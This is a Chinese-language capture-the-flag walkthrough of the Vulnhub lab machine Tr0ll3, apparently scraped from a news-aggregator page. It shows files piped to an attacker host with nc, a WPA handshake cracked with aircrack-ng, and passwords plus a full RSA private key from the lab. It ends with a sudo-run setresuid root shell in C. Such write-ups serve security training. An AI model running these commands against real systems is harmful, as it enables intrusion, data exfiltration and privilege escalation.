当前位置: 首页 > news >正文

[Vulnhub] Tr0ll3 aircrack-ng+lynx

news 来源:原创 2024/9/20 7:25:44

信息收集

IP AddressOpening Ports
192.168.101.147TCP:22

image.png

$ ssh start@192.168.101.147

image-1.png

用户:Start

start@Tr0ll3:~$ find / -type f -perm 0777 2>/tmp/1

start@Tr0ll3:~$ cat /var/log/.dist-manage/wytshadow.cap | nc 192.168.101.128 10035

WIFI握手包

image-2.png

aircrack-ng 破解握手包

start@Tr0ll3:~$ cat /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt | nc 192.168.101.128 10035

$ aircrack-ng -w gold_star.txt wytshadow.cap

image-3.png

用户:wytshadow

wytshadow:gaUoCe34t1

image-4.png

wytshadow@Tr0ll3:/home/start$ sudo -l

image-6.png

wytshadow@Tr0ll3:/home/start$ cat /etc/nginx/sites-available/default

image-7.png

wytshadow@Tr0ll3:/home/start$ sudo /usr/sbin/service nginx start
wytshadow@Tr0ll3:/home/start$ netstat -lnput

image-8.png

$ lynx http://192.168.101.147:8080

Lynx是一款文本模式的网页浏览器。它最初由Thomas Dickey在1992年开发,旨在为没有图形界面的终端用户提供网页浏览功能。Lynx在Unix和Linux系统上尤其流行,因为它可以通过命令行界面快速浏览网页而不需要图形界面支持

image-9.png

Username: genphlux
Password: HF9nd0cR!

用户:genphlux

genphlux@Tr0ll3:~$ su genphulx

image-10.png

genphlux@Tr0ll3:~$ file maleus

image-11.png

genphlux@Tr0ll3:~$ cat maleus

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
7BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
1cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
2H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
5XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
-----END RSA PRIVATE KEY-----

用户:maleus

$ chmod 600 key
$ ssh maleus@192.168.101.147 -i id_rsa

image-12.png

maleus@Tr0ll3:~$ cat .viminfo

image-13.png

password:B^slc8I$

权限提升

image-14.png

通过重新编译来获取ROOT权限

image-15.png

maleus@Tr0ll3:~$ echo -e 'int main (void){setresuid(0, 0, 0);system("/bin/sh");}'>dont_even_bother.c
maleus@Tr0ll3:~$ rm dont_even_bother
maleus@Tr0ll3:~$ gcc dont_even_bother.c -o dont_even_bother

image-16.png

maleus@Tr0ll3:~$ sudo /home/maleus/dont_even_bother

image-17.png

# cat /root/flag.txt

image-18.png

Pr00fThatTh3L33tHax0rG0tTheFl@g!!

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • ref和reactive
  • RabbitMQ的工作模式
  • 微服务-注册中心
  • linux之find指令基础
  • STM32智能交通灯系统教程
  • YOWOv2(yowov2)动作识别+Fastreid身份识别 详细安装与实现
  • apt update报错E: Dynamic MMap ran out of room
  • 集成excel工具:自定义导入回调监听器、自定义类型转换器、web中的读
  • JMESPath: 强大的处理JSON数据
  • Python|OpenCV-实现人物的姿态识别检测以及实时计数(18)
  • 解决:WPS,在一个表格中,按多次换行,无法换到下一页
  • Web 性能入门指南-1.5 创建 Web 性能优化文化的最佳实践
  • 概率论期末速成(知识点+例题)
  • Nginx 负载均衡详解
  • windows USB 设备驱动开发-USB 功能控制器驱动开发(一)
  • 【mysql】环境安装、服务启动、密码设置
  • exports和module.exports
  • flutter的key在widget list的作用以及必要性
  • Javascript弹出层-初探
  • JavaScript设计模式系列一:工厂模式
  • miaov-React 最佳入门
  • React中的“虫洞”——Context
  • SpiderData 2019年2月13日 DApp数据排行榜
  • 工作中总结前端开发流程--vue项目
  • 极限编程 (Extreme Programming) - 发布计划 (Release Planning)
  • 问题之ssh中Host key verification failed的解决
  • 新书推荐|Windows黑客编程技术详解
  • ​【C语言】长篇详解,字符系列篇3-----strstr,strtok,strerror字符串函数的使用【图文详解​】
  • ​Python 3 新特性:类型注解
  • ​VRRP 虚拟路由冗余协议(华为)
  • ​探讨元宇宙和VR虚拟现实之间的区别​
  • ######## golang各章节终篇索引 ########
  • #includecmath
  • #免费 苹果M系芯片Macbook电脑MacOS使用Bash脚本写入(读写)NTFS硬盘教程
  • (2021|NIPS,扩散,无条件分数估计,条件分数估计)无分类器引导扩散
  • (附源码)springboot建达集团公司平台 毕业设计 141538
  • (七)glDrawArry绘制
  • (七)Knockout 创建自定义绑定
  • (十)c52学习之旅-定时器实验
  • (十二)springboot实战——SSE服务推送事件案例实现
  • (十三)Maven插件解析运行机制
  • (四)linux文件内容查看
  • (一)SvelteKit教程:hello world
  • (转)es进行聚合操作时提示Fielddata is disabled on text fields by default
  • (转)linux 命令大全
  • (转)大道至简,职场上做人做事做管理
  • (转)重识new
  • *p=a是把a的值赋给p,p=a是把a的地址赋给p。
  • . NET自动找可写目录
  • .net core 3.0 linux,.NET Core 3.0 的新增功能
  • .Net IOC框架入门之一 Unity
  • .net Signalr 使用笔记
  • .net 连接达梦数据库开发环境部署
  • .NET/C# 检测电脑上安装的 .NET Framework 的版本
  • .NET/C# 使窗口永不激活(No Activate 永不获得焦点)